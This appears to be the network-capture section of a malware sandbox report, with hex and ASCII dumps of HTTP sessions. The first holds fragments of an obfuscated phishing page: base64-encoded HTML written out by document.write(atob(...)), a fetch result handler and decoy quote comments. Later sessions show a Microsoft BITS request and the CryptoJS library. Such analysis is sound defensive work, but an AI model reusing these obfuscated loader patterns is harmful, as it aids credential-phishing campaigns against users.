                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC1369INData Raw: 6d 46 30 53 31 4a 77 53 6b 52 73 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a 5a 58 4e 7a 4a 79 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 62 47 39 68 5a 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: mF0S1JwSkRsKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNjZXNzJyl7DQogICAgICAgIGxvY2F0aW9uLnJlbG9hZCgpOw0KICAgICAgICB9DQogICAgICAgIGlmKGRhdGFb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC1369INData Raw: 56 63 43 53 51 5a 6a 69 2e 70 61 74 68 6e 61 6d 65 20 3d 20 6c 61 56 63 43 53 51 5a 6a 69 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 4d 6c 46 6b 6d 70 75 75 6e 68 20 3d 20 6c 61 56 63 43 53 51 5a 6a 69 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 4d 6c 46 6b 6d 70 75 75 6e 68 20 3d 3d 20 69 79 42 6c 69 74 74 6a 67 59 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 6a 77 68 4c 53 30 67 50 47 52 70 64 6a 35 55 61 47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: VcCSQZji.pathname = laVcCSQZji.pathname.slice(0, -1);}const MlFkmpuunh = laVcCSQZji.pathname+'/';if(MlFkmpuunh == iyBlittjgY){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCjwhLS0gPGRpdj5UaG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC1369INData Raw: 65 6d 55 36 4d 53 34 31 63 6d 56 74 4f 33 30 4e 43 6e 30 4e 43 69 4e 4a 54 32 6c 72 54 48 68 6a 64 47 70 46 49 48 42 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 77 4f 32 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 4d 58 4a 6c 62 54 74 39 44 51 6f 6a 53 55 39 70 61 30 78 34 59 33 52 71 52 53 35 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: emU6MS41cmVtO30NCn0NCiNJT2lrTHhjdGpFIHB7bWFyZ2luLXRvcDowO21hcmdpbi1ib3R0b206MXJlbTt9DQojSU9pa0x4Y3RqRS5jb250YWluZXJ7d2lkdGg6IDEwMCU7cGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcml
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC1369INData Raw: 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 74 6a 62 32 78 76 63 6a 6f 67 49 7a 41 77 4d 44 74 77 59 57 52 6b 61 57 35 6e 4f 69 41 79 4d 48 42 34 4f 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 54 68 77 65 44 74 76 64 6d 56 79 63 32 4e 79 62 32 78 73 4c 57 4a 6c 61 47 46 32 61 57 39 79 4f 69 42 6a 62 32 35 30 59 57 6c 75 4f 79 49 2b 44 51 6f 38 49 53 30 74 49 44 78 6b 61 58 59 2b 55 33 52 76 63 43 42 6a 61 47 46 7a 61 57 35 6e 49 48 52 6f 5a 53 42 74 62 32 35 6c 65 53 42 68 62 6d 51 67 63 33 52 68 63 6e 51 67 59 32 68 68 63 32 6c 75 5a 79 42 30 61 47 55 67 63 47 46 7a 63 32 6c 76 62 69 34 38 4c 32 52 70 64 6a 34 67 4c 53 30 2b 43 6a 78 6b 61 58 59 67 61 57 51 39 49 6b 6c 50 61 57 74 4d 65 47 4e 30 61 6b 55 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: mFja2dyb3VuZC1jb2xvcjogI2ZmZjtjb2xvcjogIzAwMDtwYWRkaW5nOiAyMHB4O2ZvbnQtc2l6ZTogMThweDtvdmVyc2Nyb2xsLWJlaGF2aW9yOiBjb250YWluOyI+DQo8IS0tIDxkaXY+U3RvcCBjaGFzaW5nIHRoZSBtb25leSBhbmQgc3RhcnQgY2hhc2luZyB0aGUgcGFzc2lvbi48L2Rpdj4gLS0+CjxkaXYgaWQ9IklPaWtMeGN0akUi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC1369INData Raw: 34 67 63 32 56 6a 64 58 4a 6c 4c 67 30 4b 50 43 45 74 4c 53 42 55 61 47 55 67 63 32 56 6a 63 6d 56 30 49 47 39 6d 49 48 4e 31 59 32 4e 6c 63 33 4d 67 61 58 4d 67 64 47 38 67 5a 47 38 67 64 47 68 6c 49 47 4e 76 62 57 31 76 62 69 42 30 61 47 6c 75 5a 79 42 31 62 6d 4e 76 62 57 31 76 62 6d 78 35 49 48 64 6c 62 47 77 75 49 43 30 74 50 67 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 68 4c 53 30 67 56 47 68 6c 49 48 4e 31 59 32 4e 6c 63 33 4e 6d 64 57 77 67 64 32 46 79 63 6d 6c 76 63 69 42 70 63 79 42 30 61 47 55 67 59 58 5a 6c 63 6d 46 6e 5a 53 42 74 59 57 34 73 49 48 64 70 64 47 67 67 62 47 46 7a 5a 58 49 74 62 47 6c 72 5a 53 42 6d 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 4gc2VjdXJlLg0KPCEtLSBUaGUgc2VjcmV0IG9mIHN1Y2Nlc3MgaXMgdG8gZG8gdGhlIGNvbW1vbiB0aGluZyB1bmNvbW1vbmx5IHdlbGwuIC0tPgo8L2Rpdj4NCjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8L2Rpdj4NCjwhLS0gVGhlIHN1Y2Nlc3NmdWwgd2FycmlvciBpcyB0aGUgYXZlcmFnZSBtYW4sIHdpdGggbGFzZXItbGlrZSBmb


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6192.168.2.44974823.43.61.160443
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-CID: 11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=257073
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-CID: 2


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7192.168.2.449750104.17.25.144434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC650OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://hfj.rontishet.ru/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC926INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: W/"61182885-40eb"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 328326
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Sat, 20 Sep 2025 17:20:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1n40D86t2Z7Vkt5oFuHhfDW%2BJbxcmbt0KQ1QgHbjwn5VnyskQpv36cskEg6tk8dwOxLJBQwRkWIFtb7JAFS89g9Id67srfZYH69q5gW140bMUW7aZeAwDyzSu4%2FMFmjNmHIfdBPa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e228a81043ef-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC443INData Raw: 37 63 30 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 7c01!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC1369INData Raw: 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: lobalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC1369INData Raw: 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 28 34 29 2e 72 65 61 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rds.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).read
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC1369INData Raw: 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c 61 29 3b 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC1369INData Raw: 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 35 5d 3d 65 5b 35 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+886263092+(e[4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC1369INData Raw: 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 33 5d 3d 49 5b 33 5d 2b 28 49 5b 32 5d 3c 3c 38 7c 49 5b 32 5d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(I[2]<<8|I[2]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC1369INData Raw: 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: stanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=t.words,r=t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC1369INData Raw: 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: exOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw
